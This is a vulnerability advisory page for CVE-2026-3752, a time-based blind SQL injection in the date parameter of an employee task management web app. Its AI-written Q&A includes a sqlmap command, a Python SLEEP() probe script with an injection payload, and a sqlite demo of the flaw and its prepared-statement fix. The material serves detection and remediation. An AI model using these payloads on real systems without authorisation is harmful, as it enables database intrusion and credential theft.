CVE-2026-3752
Status: Received - Intake
SQL Injection in SourceCodester Employee Task Management System

Publication date: 2026-03-08

Last updated on: 2026-04-29

Assigner: VulDB

Description
A flaw has been found in SourceCodester Employee Task Management System up to version 1.0. An unknown function in the file /daily-task-report.php (GET Parameter Handler component) is affected: manipulating the argument Date (the date GET parameter) results in SQL injection. The attack can be launched remotely. An exploit has been published and may be used.
Meta Information
Generated: 2026-05-07
AI Q&A: 2026-03-08
EPSS Evaluated: 2026-05-05
Affected Vendors & Products (1 associated CPE)
Vendor: oretnom23 | Product: employee_task_management_system | Version: 1.0
CWE ID: Description
CWE-74: The product constructs all or part of a command, data structure, or record using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify how it is parsed or interpreted when it is sent to a downstream component.
CWE-89: The product constructs all or part of an SQL command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended SQL command when it is sent to a downstream component. Without sufficient removal or quoting of SQL syntax in user-controllable inputs, the generated SQL query can cause those inputs to be interpreted as SQL instead of ordinary user data.
AI Powered Q&A
How can this vulnerability impact me?

An attacker who can reach /daily-task-report.php with a valid session can use the time-based blind SQL injection in the date parameter to enumerate the database schema and read data the application stores, including employee records and administrator credentials, even though the page never returns query results directly.

Because the injected SQL runs with the privileges of the application's database account, the flaw affects confidentiality and, depending on that account's grants, integrity and availability as well. Exploitation is remote but, as described here, takes place after authentication to the application.


How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?:

I don't know


Can you explain this vulnerability to me?

CVE-2026-3752 is a SQL injection vulnerability in SourceCodester Employee Task Management System version 1.0, located in the file /daily-task-report.php. The value of the GET parameter date is used in a SQL query without proper validation or escaping.

An authenticated attacker can exploit this by manipulating the date parameter to perform a time-based blind SQL injection: the injected SQL calls a function such as MySQL's SLEEP(), and the attacker infers the database's answer to each injected condition from whether the response is delayed. This lets the attacker extract data from the backend database one bit or character at a time, even though the page never displays query output. [1, 2, 3]


How can this vulnerability be detected on my network or system? Can you suggest some commands?

Test the date GET parameter of /daily-task-report.php for time-based blind SQL injection: inject a value that calls the MySQL SLEEP() function and compare the response time with that of a benign date value. A request that consistently takes the requested number of seconds longer confirms that injected SQL is reaching the database. The page requires an authenticated session, so the test must be run with a valid PHPSESSID cookie.

A practical way to confirm the injection point is sqlmap, with a command similar to:

sqlmap -u "http://127.0.0.1:8085/daily-task-report.php?date=60120-02-02" --batch -v 6 --risk=3 --cookie "PHPSESSID=YOUR_COOKIE_HERE"

This sends crafted values for the date parameter and measures response delays. Two caveats when the target is not a throwaway test copy: --risk=3 enables OR-based payloads that the sqlmap documentation itself warns can modify every row if the vulnerable statement is an UPDATE or DELETE, so prefer the default risk level or --technique=T to limit testing to time-based checks; and time-based detection is noisy on a loaded server, so repeat the measurement before drawing a conclusion. [2]
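The timing comparison that sqlmap automates can also be scripted directly, which is useful when you only want a yes/no answer for one parameter. The following is an added example and not code from the advisory, the vendor or sqlmap; the target URL, port, cookie name and the exact SLEEP() payload are assumptions for illustration (the payload is a generic MySQL time-delay probe, not the published exploit), and the PHPSESSID value must be a real session from the application:

```python
"""Time-based blind SQL injection probe for one GET parameter.

Sends a benign request and a request whose `date` value carries a MySQL
SLEEP() payload, takes several timing samples of each, and decides from
the medians whether the delay was injected. Target, cookie and payload are
assumptions for this example.
"""
import statistics
import time
import urllib.parse
import urllib.request

DELAY_SECONDS = 5
# Illustrative single-quote breakout followed by SLEEP(); not the published PoC.
SLEEP_PAYLOAD = "2024-01-01' AND SLEEP({d})-- -"


def build_url(base, param, value):
    """Return base?param=value with the value URL-encoded."""
    return base + "?" + urllib.parse.urlencode({param: value})


def timed_get(url, cookie, timeout=30):
    """Fetch url with the given Cookie header and return the elapsed seconds."""
    req = urllib.request.Request(url, headers={"Cookie": cookie})
    start = time.monotonic()
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        resp.read()
    return time.monotonic() - start


def looks_injectable(baseline_times, payload_times, delay=DELAY_SECONDS):
    """Decide from timing samples whether the requested delay was injected.

    Medians are used so one slow baseline request on a busy server does not
    produce a false positive; the payload median must exceed the baseline
    median by at least the requested delay minus a 10% tolerance.
    """
    base = statistics.median(baseline_times)
    inj = statistics.median(payload_times)
    return inj - base >= delay * 0.9


def probe(base_url, param, cookie, samples=3, delay=DELAY_SECONDS):
    """Collect baseline and payload timings and return (verdict, baseline, payload)."""
    benign = build_url(base_url, param, "2024-01-01")
    malicious = build_url(base_url, param, SLEEP_PAYLOAD.format(d=delay))
    baseline = [timed_get(benign, cookie) for _ in range(samples)]
    delayed = [timed_get(malicious, cookie) for _ in range(samples)]
    return looks_injectable(baseline, delayed, delay), baseline, delayed


if __name__ == "__main__":
    # Assumed local test instance; replace the cookie with a live session value.
    verdict, b, d = probe("http://127.0.0.1:8085/daily-task-report.php", "date",
                          "PHPSESSID=YOUR_COOKIE_HERE")
    print("time-based injection:", verdict, "baseline", b, "payload", d)
```

Run it only against an instance you are authorised to test; each positive sample holds a database connection for the full SLEEP() duration, so keep the sample count small on a shared server.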


What immediate steps should I take to mitigate this vulnerability?

No vendor patch or official mitigation has been documented for this vulnerability at the time of writing, and replacing the affected product with an alternative that does not contain the flaw is suggested.

Until a fix is available: limit who can reach the application, since exploitation needs an authenticated session (network restriction, VPN access only, removal of unused accounts); run the application's database user with the minimum grants it needs so that a successful injection cannot alter or drop data; monitor web server logs for requests to /daily-task-report.php whose date value contains SQL syntax (quotes, SLEEP, AND/OR, comment sequences) or that take abnormally long to complete; and apply any update the vendor releases.

If you maintain the code yourself, the correct fix for CWE-89 is to validate the date parameter against a strict YYYY-MM-DD format and pass it to the query as a bound parameter of a prepared statement instead of concatenating it into the SQL string. [3]
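To make the CWE-89 defect and its fix concrete, the following added example (not the application's own code, which the advisory does not publish) reconstructs the pattern with Python's sqlite3 module and a constructed task table. SQLite has no SLEEP(), so the injection demonstrated is boolean-based rather than time-based, but the string-concatenation defect and the validate-then-bind fix are the same ones that apply to the PHP/MySQL application:

```python
"""Vulnerable vs. hardened handling of a date GET parameter (added example).

The table name, columns and rows below are constructed for the demo and are
not taken from the affected product.
"""
import re
import sqlite3
from datetime import date

# Strict YYYY-MM-DD shape; the datetime check below rejects impossible values.
DATE_RE = re.compile(r"^[0-9]{4}-[0-9]{2}-[0-9]{2}$")


def setup_db():
    """Create an in-memory database with constructed sample tasks."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE task_list (id INTEGER, title TEXT, date_created TEXT)")
    conn.executemany(
        "INSERT INTO task_list VALUES (?, ?, ?)",
        [(1, "Write report", "2024-01-01"),
         (2, "Review budget", "2024-01-02"),
         (3, "Admin audit", "2024-01-03")],
    )
    return conn


def report_vulnerable(conn, date_param):
    """CWE-89: the untrusted GET value is spliced into the SQL text."""
    sql = ("SELECT id, title FROM task_list WHERE date_created = '"
           + date_param + "'")
    return conn.execute(sql).fetchall()


def validate_date(date_param):
    """Return date_param if it is a real YYYY-MM-DD date, else raise ValueError."""
    if not DATE_RE.match(date_param):
        raise ValueError("date must be YYYY-MM-DD")
    y, m, d = (int(x) for x in date_param.split("-"))
    date(y, m, d)  # raises ValueError for impossible dates such as 2024-13-40
    return date_param


def is_valid_date(date_param):
    """Boolean wrapper around validate_date for callers that prefer not to catch."""
    try:
        validate_date(date_param)
        return True
    except ValueError:
        return False


def report_safe(conn, date_param):
    """Validated value passed as a bound parameter: it can never alter the
    statement's structure, whatever characters it contains."""
    value = validate_date(date_param)
    return conn.execute(
        "SELECT id, title FROM task_list WHERE date_created = ?", (value,)
    ).fetchall()


if __name__ == "__main__":
    db = setup_db()
    payload = "' OR '1'='1"
    print("vulnerable, benign :", report_vulnerable(db, "2024-01-01"))
    print("vulnerable, payload:", report_vulnerable(db, payload))
    print("safe, benign       :", report_safe(db, "2024-01-01"))
    print("safe, payload valid?", is_valid_date(payload))
```

With the payload, the concatenated query becomes `... WHERE date_created = '' OR '1'='1'` and returns every row, while the hardened path rejects the value before any SQL runs; even if validation were skipped, the bound parameter would be compared as a literal string and match nothing. Note that the regex also rejects the five-digit year in the sqlmap example above, so allow-list validation alone would have blocked that request.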

